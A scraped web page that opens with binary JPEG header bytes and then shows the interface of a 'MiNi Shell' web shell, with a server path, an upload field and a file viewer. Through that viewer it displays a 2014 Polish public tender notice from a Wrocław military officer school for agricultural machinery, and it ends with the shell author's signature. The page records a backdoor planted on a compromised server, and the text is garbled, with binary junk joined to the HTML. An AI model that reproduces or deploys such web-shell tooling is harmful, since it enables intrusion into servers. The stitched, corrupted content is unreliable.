JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140609/193198-N-2014.html

<p class="kh_header"><b>Wrocław: ZAKUP MASZYN ROLNICZYCH, KOSIAREK, PŁUGU ODŚNIEŻNEGO, PRZYCZEPY, MYJKI I PODSTAWY POD PODNOŚNIK KOLUMNOWY 
SPRAWA 29/PN/2014</b><br>
<b>Numer ogłoszenia: 193198 - 2014; data zamieszczenia: 09.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wyższa Szkoła Oficerska Wojsk Lądowych im. gen. Tadeusza Kościuszki , ul. Czajkowskiego 109, 51-150 Wrocław, woj. dolnośląskie, tel. 071 7658555, faks 071 7658425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http.//www. wso.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP MASZYN ROLNICZYCH, KOSIAREK, PŁUGU ODŚNIEŻNEGO, PRZYCZEPY, MYJKI I PODSTAWY POD PODNOŚNIK KOLUMNOWY 
SPRAWA 29/PN/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup maszyn rolniczych i urządzeń: dwóch kosiarek rotacyjnych, kosiarki bijakowej z koszem podnoszonym samowyładowawczym, pługu odśnieżnego do ciągnika, przyczepy 3.5t jednoosiowej samowyładowawczej, kosiarki ciągnikowej dyskowej tylnej, dmuchawy ssąco-tłoczącej do zboża, przegrabiarki do siana, dwóch myjek ciśnieniowych, dwóch podstaw pod podnośnik kolumnowy, kosiarki - traktorka z koszem - zgodnie ze szczegółowym opisem przedmiotu zamówienia, stanowiącym załącznik do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 16.00.00.00-5, 16.31.00.00-1, 16.52.00.00-6, 16.32.00.00-4, 43.31.30.00-0, 16.34.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność obejmująca przedmiot zamówienia nie wymaga szczególnych uprawnień. 
Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp - załączonego do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp - załączonego do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp - załączonego do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp - załączonego do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp - załączonego do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego do oferty należy załączyć:
- opis techniczny przedmiotu zamówienia - załącznik 4
W celu oceny, czy oferowany towar spełnia wymagania Zamawiającego, opis powinien zawierać minimum te dane techniczne, które są wyszczególnione w szczegółowym opisie technicznym przedmiotu zamówienia, oddzielnie dla każdej części zamówienia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Ofertę - formularz ofertowy przygotowany na podstawie wzoru przedstawionego przez Zamawiającego- załącznik A.
2.	Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów- załącznik 5 
Umocowanie osób podpisujących ofertę do reprezentowania Wykonawcy, zaciągania w jego imieniu zobowiązań finansowych w wysokości odpowiadającej cenie oferty oraz podpisania oferty musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli umocowanie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru), to do oferty należy dołączyć oryginał lub poświadczoną za zgodność z oryginałem przez notariusza, kopię umocowania wystawionego na reprezentanta Wykonawcy przez osoby do tego upełnomocnione.
3.	Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie zgodnie z ustawą Pzp - załącznik 6.
4.	Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej - załącznik 7.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany umowy w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona. 
2.	Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian. 
3.	Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 140 ust. 1 i art. 140 ust. 3 ustawy Pzp stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawartego w SIWZ. 
4.	Ustala się, iż nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: 
a)	zmiana nr rachunku bankowego, 
b)	zmiana danych teleadresowych. 
Zaistnienie okoliczności, o których mowa w niniejszym punkcie wymaga jedynie niezwłocznego pisemnego zawiadomienia drugiej Strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http.//www. wso.wroc.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wyższa Szkoła Oficerska Wojsk Lądowych, 51-150 Wrocław , ul. Czajkowskiego 109,  budynek 104, pokój 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2014 godzina 11:00, miejsce: Siedziba Zamawiającego ul. Czajkowskiego 109, 51-150 Wrocław, Kancelaria Jawna - budynek nr 8 pokój 121 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KOSIARKA ROTACYJNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maszyna rolnicza do koszenia trawy i roślin zielonych, rotacyjna bębnowa, charakteryzująca się niezawodną i bezawaryjną konstrukcją, wyposażona w metalowe osłony oraz fartuch ochronny wykonany z materiału odpornego na uszkodzenia mechaniczne i czynniki atmosferyczne.
 - liczba bębnów minimum 2 szt.
 - liczba noży tnących na bębnie minimum 6 szt.
 - szerokość robocza minimum 1800mm
 - wydajność minimum 2ha/h
 - prędkość obrotowa bębnów minimum 1800obr/min 
 - obroty WOM 540obr/min
 - masa 400 - 500 kg
 - wysokość koszenia minimum 32 mm
 - przekaźnik napędowy do połączenia z ciągnikiem
 - zapasowy komplet noży 
 - gwarancja minimum 12 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KOSIARKA BIJAKOWA (MULCZER) Z KOSZEM PODNOSZONYM SAMOWYŁADOWCZYM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maszyna rolnicza do koszenia trawy i roślin zielonych, rotacyjna bijakowa.
- szerokość robocza minimum 1600mm, maksimum 2090mm
- masa maszyny maksymalnie 480 kg
- pojemność kosza minimum 0.75 m3
- prędkość robocza do 15 km/h
- liczba bijaków minimum 54 
- wysokość podnoszenia kosza minimum 1,30m
- prędkość obrotowa WOM  540obr/min
- wałek napędowy 
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PŁUG ODŚNIEŻNY DO CIĄGNIKA FARMTRACK 675.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie do odśnieżania dróg, ulic oraz placów, wraz z zestawem mocującym.
- szerokość robocza minimum 2500mm 
- liczba elementów roboczych minimum 3szt.
- skręt tarczy zgarniającej  - hydrauliczny lub równoważny
- skręt dyszla - hydrauliczny lub równoważny
- prześwit transportowy minimum 200mm
- kąt skrętu tarczy od 0 do min 260o
- zestaw mocujący pług wraz ze sterownikiem, wężami i końcówkami do podłączenia 
(montaż urządzenia na ciągniku rolniczym typu FARMTRACK 675 wraz z pokazem   działania) 
- obciążnik ( kosze na tył traktora) lub równoważne
- zapasowa guma skrawająca 1 kpl.
- prędkość robocza minimum 14km/h
- masa maszyny maksimum 500kg
- wysięgniki, tarcza zgarniająca i hydraulika sterującą 
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 43.31.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PRZYCZEPA 3.5T JEDNOOSIOWA SAMOWYŁADOWCZA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyczepa rolnicza jednoosiowa samowyładowcza
- ładowność minimum 2.5 T
- pojemność ładunkowa minimum 1,60m3
- powierzchnia ładunkowa minimum 6m2
- skrzynia ładunkowa z uniwersalnym systemem otwierania ścian, wysokość ścian skrzyni ładunkowej minimum 400mm( z możliwością podwyższenia burt)
- grubość blachy podłogi minimum 3mm
- grubość blachy ściany minimum 2mm
- instalacja hamulcowa jedno lub dwu przewodowa lub hydrauliczna lub równoważne 
- hamulec postojowy
- rodzaj dyszla: dyszel sztywny do łączenia z dolnym zaczepem ciągnika 
- instalacja oświetlenia 12V z tylnym gniazdem elektrycznym
- instalacja wywrotu z zaworem odcinającym
- siłownik teleskopowy trójstronnego wywrotu skrzyni ładunkowej
- kąt wywrotu skrzyni ładunkowej do tyłu minimum 50o, na boki minimum 45o
- prędkość konstrukcyjna minimum 30km/h
- linki spinające ściany
- koła ogumione 
- koło zapasowe ogumione
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.52.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KOSIARKA CIĄGNIKOWA DYSKOWA TYLNA (ciągnik URSUS 904, ciągnik FARMTRACK 670).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kosiarka ciągnikowa dyskowa o zwartej mocnej a zarazem lekkiej konstrukcji
- szerokość koszenia minimum 2.40m
- szerokość pokosu minimum 1.2m 
- wydajność  minimum 2.5 ha/h
- ilość dysków  minimum 6 
- ilość noży minimum 10
- moc ciągnika maksimum 48kW
- obroty WOM 540obr/min
- układ zawieszenia kat. II i III wg ISO 730/1
- prędkość koszenia minimum 10km/h
- dodatkowe 3 kpl. noży
 - wałek odbioru mocy ( przekaźnik)
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DMUCHAWA SSĄCO - TŁOCZĄCA DO ZBOŻA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dmuchawa ssąco - tłocząca mobilna z zastosowaniem w trudno dostępnych miejscach
- moc silnika  minimum 15kW
- rury tłoczące  zestaw minimum 15m. 
- kolana 2 x 90, 2 x 45stopni
- wąż ssący 3 - 4 m z ssawką 
- rozdzielacz powietrza do zboża
- stojak do rur tłoczących
- ssawa
- szybkozłącze do łączenia rur 
- urządzenie z możliwością transportu ( ciągane na  kołach za ciągnikiem)
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.34.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PRZEGRABIARKA SIANA (PRZETRZĄSACZ POKOSÓW).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegrabiarka (przetrząsacz) do roztrząsania skoszonych roślin zielonych
- szerokość robocza minimum 5m
- rodzaj zawieszenia   aktywne  kat. I i II 
- ilość wirników minimum 4  
- ilość ramion roboczych na wirnik minimum 7 
- obroty WOM minimum 540obr/min
- koła jezdne gumowane
- wałek przeniesienia mocy
- minimalna moc ciągnika 48kW
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.32.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MYJKA CIŚNIENIOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - ciśnienie minimum 130bar
- wydajność powierzchniowa  maksimum 100m2
- wydajność tłocznia wody  minimum 400l/h
- moc przyłączeniowa minimum 1,8kW
- napięcie 220-240V
Dodatkowe wyposażenie:
- wąż wysokociśnieniowy min 8m.
- pistolet spryskujący
- komplet lanc
- szczotka obrotowa
- końcówka do czyszczenia powierzchni płaskich
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.00.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PODSTAWA POD PODNOŚNIK KOLUMNOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - nośność 3-5T
- wydajność rozkładania (podnoszenia podpory) 500 do 2000mm
- dolne położenie 500-600mm, górne 1800-2000mm
- zabezpieczenie wyciąganej podpory lokowane przed samo wypięciem
- podpory atestowane
- gwarancja minimum 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> KOSIARKA -TRAKTOREK DO ZASTOSOWANIA
 PRZY DUŻYCH POWIERZCHNIACH TRAWNIKÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - silnik zasilany benzyną bezołowiową 95 oktanową
- pojemność silnika  min 500 cm3 
- moc silnika min 8,9 kW
- z  6 - biegową skrzynią biegów typu transmatic
- szerokość koszenia min 105 cm
- wysokość koszenia regulowana  od  min 30 do 95 mm  bezstopniowo lub przy minimum 5-ciu stopniach regulacji
- pojemność kosza na trawę  min 240l
- poziom mocy akustycznej  max 100dB
Dodatkowe  wymagania:
- promień skrętu  min 46 cm
- waga  około 200kg
- towar dostarczony w stanie zmontowanym, gotowym do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com